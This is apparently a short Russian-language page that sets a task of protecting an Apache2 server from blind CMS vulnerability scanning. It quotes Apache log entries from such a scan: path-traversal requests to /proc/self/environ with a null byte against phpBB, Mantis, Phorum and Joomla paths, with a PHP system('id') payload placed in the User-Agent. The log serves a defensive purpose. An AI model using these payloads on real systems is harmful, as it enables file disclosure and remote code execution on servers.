Задача: защитить веб-сервер Apache2 от атак слепого перебора багов возможной CMS сайта типа такого:
surdoserver.ru:80 127.0.0.1 - - [23/Dec/2011:07:20:11 +0000] "GET /install.php?phpbb_root_di r=../../../../../../../proc/self/environ%00 HTTP/1.0" 404 3449 "-" "&lt;?php system(\"id\"); ?&gt;"<br /> surdoserver.ru:80 127.0.0.1 - - [23/Dec/2011:07:20:11 +0000] "GET /mantis/login_page.php?g_meta_inc _dir=../../../../../../../proc/self/environ%00 HTTP/1.0" 404 3449 "-" "&lt;?php system(\"id\"); ?&gt;"<br /> surdoserver.ru:80 127.0.0.1 - - [23/Dec/2011:07:20:11 +0000] "GET /page.php?template=../../../../../../../proc/self/environ%00 HTTP/1.0" 404 3449 "-" "&lt;?php system(\"id\"); ?&gt;"<br /> surdoserver.ru:80 127.0.0.1 - - [23/Dec/2011:07:20:11 +0000] "GET /phorum/admin/actions/del.php?include_path=../../../../../../../proc/self/environ%00 HTTP/1.0" 404 3449 "-" "&lt;?php system(\"id\"); ?&gt;"<br /> surdoserver.ru:80 127.0.0.1 - - [23/Dec/2011:07:20:11 +0000] "GET /pollensondage.inc.php?app _path=../../../../../../../proc/self/environ%00 HTTP/1.0" 404 3449 "-" "&lt;?php system(\"id\"); ?&gt;"<br /> surdoserver.ru:80 127.0.0.1 - - [23/Dec/2011:07:20:40 +0000] "GET /joomla/index.php?option=com_sbsfile&amp;controller= ../../../../../../../proc/self/environ%00 HTTP/1.0" 404 3449 "-" "&lt;?php system(\"id\"); ?&gt;"surdoserver.ru:80 127.0.0.1 - - [23/Dec/2011:07:20:41 +0000] "GET /joomla/index.php?option=com_rokdownloads&amp;controller= ../../../../../../../proc/self/environ%00 HTTP/1.0" 404 3449 "-" "&lt;?php system(\"id\"); ?&gt;"surdoserver.ru:80 127.0.0.1 - - [23/Dec/2011:07:20:41 +0000] "GET /joomla/index.php?option=com_sectionex&amp;controller= ../../../../../../../proc/self/environ%00 HTTP/1.0" 404 3449 "-" "&lt;?php system(\"id\"); ?&gt;"surdoserver.ru:80 127.0.0.1 - - [23/Dec/2011:07:20:41 +0000] "GET /joomla/index.php?option=com_ganalytics&amp;controller= ../../../../../../../proc/self/environ%00 HTTP/1.0" 404 3449 "-" "&lt;?php system(\"id\"); ?&gt;"surdoserver.ru:80 127.0.0.1 - - [23/Dec/2011:07:20:41 +0000] "GET /joomla/index.php?option=com_janews&amp;controller= ../../../../../../../proc/self/environ%00 HTTP/1.0" 404 3449 "-" "&lt;?php system(\"id\"); ?&gt;"surdoserver.ru:80 127.0.0.1 - - [23/Dec/2011:07:20:41 +0000] "GET /joomla/index.php?option=com_linkr&amp;controller= ../../../../../../../proc/self/environ%00 HTTP/1.0" 404 3449 "-" "&lt;?php system(\"id\"); ?&gt;"
Просмотров: 1739